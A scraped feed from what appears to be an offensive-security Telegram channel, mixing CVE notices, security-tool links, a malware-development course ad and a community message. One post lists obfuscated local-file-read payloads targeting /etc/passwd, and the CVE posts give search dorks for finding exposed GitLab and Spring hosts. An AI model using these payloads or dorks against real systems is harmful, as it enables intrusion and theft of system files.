Brut Security
15.9K subscribers
1.05K photos
90 videos
298 files
1.14K links
βœ…DM: @wtf_brut
πŸ›ƒWhatsApp: https://wa.link/brutsecurity
🈴Training: https://brutsecurity.com
πŸ“¨Mail: info@brutsec.com
Download Telegram
Brut Security Website is now live- Visit- https://brutsec.com/
πŸ‘15πŸ—Ώ3
Did you know that you can smuggle payloads in your email & phone number if incorrect validation is done!
πŸ”₯9πŸ‘3
Payloads for LFR/LFD βš”οΈ
file:/etc/passwd%3F/ 
file:/etc%252Fpasswd/
file:/etc%252Fpasswd%3F/
file:///etc/%3F/../passwd
file:${br}/et${u}c%252Fpas${te}swd%3F/
file:$(br)/et$(u)c%252Fpas$(te)swd%3F/
❀4πŸ‘4
BLACKFRIDAY2024 SALE: Get all of our malware development and red teaming courses bundle for only $199.

❌$400
βœ…$199

Start your new year with developing malware and building offensive tools

redteamsorcery.teachable.com/p/learnthemall
🀨3πŸ‘2❀1
CVE-2024-11274, -8233, other: Multiple vulnerabilities in GitLab, 7.5 - 8.7 rating❗

In a new release, GitLab talked about two important vulnerabilities. One of them allows attacker to carry out DoS, the second allows to steal session data and potentially gain unauthorized access to accounts. Several smaller vulnerabilities are also mentioned.

Search at Netlas.io:
πŸ‘‰ Link: https://nt.ls/xM1vs
πŸ‘‰ Dork: http.favicon.hash_sha256:72a2cad5025aa931d6ea56c3201d1f18e68a8cd39788c7c80d5b2b82aa5143ef OR http.headers.set_cookie:"gitlab" OR http.headers.location:"gitlab"

Vendor's advisory: https://about.gitlab.com/releases/2024/12/11/patch-release-gitlab-17-6-2-released/
πŸ‘4🀨2
πŸ—Ώ13πŸ”₯7❀4πŸ‘4
🐳6πŸ‘3
✨In the world of cybersecurity, there is no mercyβ€”only the relentless pursuit of vulnerabilities. Hunt with precision, adapt with resilience, and remember: it’s hunt or be hunted. For those of us climbing to the top of the food chain, there can be no mercyβ€”only one rule: hunt or be hunted.✨
Please open Telegram to view this post
VIEW IN TELEGRAM
❀10πŸ”₯4πŸ‘1
πŸ”– Dnsbruter - A powerful tool for active subdomain enumeration and discovery.

✨ Features:
Dnsbruter uses DNS resolution to bruteforce and identify subdomains efficiently. Its multithreading capability allows users to control concurrency for faster and more effective results. Perfect for researchers and pen testers targeting domain reconnaissance.

πŸ”— https://github.com/RevoltSecurities/Dnsbruter/
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ”₯12πŸ‘4
✨ CRLF Injection Tips
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ‘11❀3
SQL injection.pdf
599.4 KB
πŸ”₯5πŸ‘1
CVE-2024-38819: Path Traversal in Spring Framework, 7.5 rating❗️

Another Path Traversal vulnerability in the Spring framework. This time there is even a PoC!

Search at Netlas.io:
πŸ‘‰ Link: https://nt.ls/AzCtg
πŸ‘‰ Dork: tag.name:"spring"

Vendor's advisory: https://spring.io/security/cve-2024-38819
πŸ‘6❀3
⚑️SSRFUtility - SSRF Exploitation Tool
πŸ”— https://ssrf.cvssadvisor.com/
❀15
🀑🀑
Please open Telegram to view this post
VIEW IN TELEGRAM
🐳13πŸ—Ώ8πŸ‘3🀨2
πŸ”– IVRE - The Ultimate Network Reconnaissance Framework

✨ Key Features:
IVRE allows you to build your self-hosted, fully controlled alternatives to tools like Shodan, ZoomEye, Censys, and GreyNoise.

- Run your Passive DNS service
- Create tailor-made EASM tools
- Collect and analyze network intelligence using Nmap, Masscan, Zeek, p0f, ProjectDiscovery tools, and more!

Perfect for security researchers and network analysts.

πŸ”— Get the tool here: https://github.com/ivre/ivre
πŸ‘4
πŸŽ„ Wrapping Up an Amazing Year Together! πŸŽ„

Hey Brut Fam! πŸš€As 2024 comes to a close, I want to thank each and every one of you for being part of this amazing journey. This year, we’ve shared 1,500+ resources, learned, grown, and built an incredible community of 8,000+ members. Your support and engagement have made Brut Security what it is today. πŸ’ͺ

If you’ve found value in the resources I’ve shared and want to support me in continuing this journey, you can now buy me a coffee β˜• here:

β˜„οΈ https://buymeacoffee.com/saumadip

It’s not mandatoryβ€”just a small way to show appreciation if you feel like it.

Wishing you all a early very Merry Christmas πŸŽ… and a Happy New Year πŸŽ‰ filled with learning, growth, and success! Here’s to an even bigger and better 2025! πŸš€

Stay curious, stay secure. πŸ”
Please open Telegram to view this post
VIEW IN TELEGRAM
❀3πŸ‘3πŸ‘¨β€πŸ’»2πŸ”₯1🐳1